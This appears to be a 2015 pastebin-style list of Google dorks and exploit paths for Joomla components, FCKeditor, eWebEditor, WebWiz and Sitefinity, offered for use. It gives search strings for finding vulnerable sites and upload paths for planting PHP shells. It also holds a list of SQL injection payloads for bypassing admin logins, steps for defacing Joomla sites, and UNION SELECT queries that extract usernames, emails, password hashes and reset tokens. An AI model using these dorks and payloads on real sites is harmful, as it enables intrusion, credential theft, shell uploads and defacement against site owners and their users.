Kyfx

Exploit Dorks for Joomla, FCK and others 2015 Old but gold

Aug 24th, 2015
inurl:”/admin/saveannounce_upload.asp”

inurl:”admin/eWebEditor/Upload.asp”

inurl:”UploadFile/upload.asp”

WEBWIZ VULNERABILITY (RTE UPLOAD VULNERABILITY)

inurl:rte/my_documents/my_files/
inurl:/my_documents/my_files/
exploit: /rte/RTE_popup_file_atch.asp

Editor vulnerability

inurl:editor/assetmanager/ (the search query can be improved)

EXPLOIT : /Editor/assetmanager/assetmanager.asp

Joomla upload vulnerability

inurl index.php?option=com_expose

Exploit: administrator/components/com_expose/uploadimg.php
Upload destination : /components/com_expose/expose/img/

Sitefinity: Login upload vulnerability

inurl:”Sitefinity: Login”
exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Auto Login For Joomla Dork .:old:.
inurl:/administrator/index.php?autologin=1

---
BYPASS ADMIN ACCESS

Dorks:
Code:
inurl:admin.asp
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

Code:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a

----
Joomla Component com_smartformer shell upload

Google Dork inurl:"index.php?option=com_smartformer"
& upload shell.php

Your shell :
http://localhost/components/com_smartformer/files/yourshell.php

---
Ministry Web Designing Multiple Vulnerabilities
exploit bypass to login:
user: '=' 'or'
pass: '=' 'or'

Vulnerable Sections:

inurl:/downloadcounter/admin/login.php
inurl:/mediaprogram/admin/index.php
inurl:/churchprogram/login.php
----
(Deface)Exploit (Remote Deface ) Joomla Component
Dork : inurl:index.php?option=com_fabrik
Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
---
[Priv8] Joomla Com_content exploit - defacing joomla websites

Dork :
inurl:index.php?option=com_content & "/mambots/editors/fckeditor"

Vulnerable File :
mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

You can exploit this vulnerable joomla component and deface joomla websites and you can also sometimes upload your shell
----
exploit joomla "com_artforms" reset password

Dork : inurl:"option com_artforms"

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

/index.php?option=com_user&view=reset

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users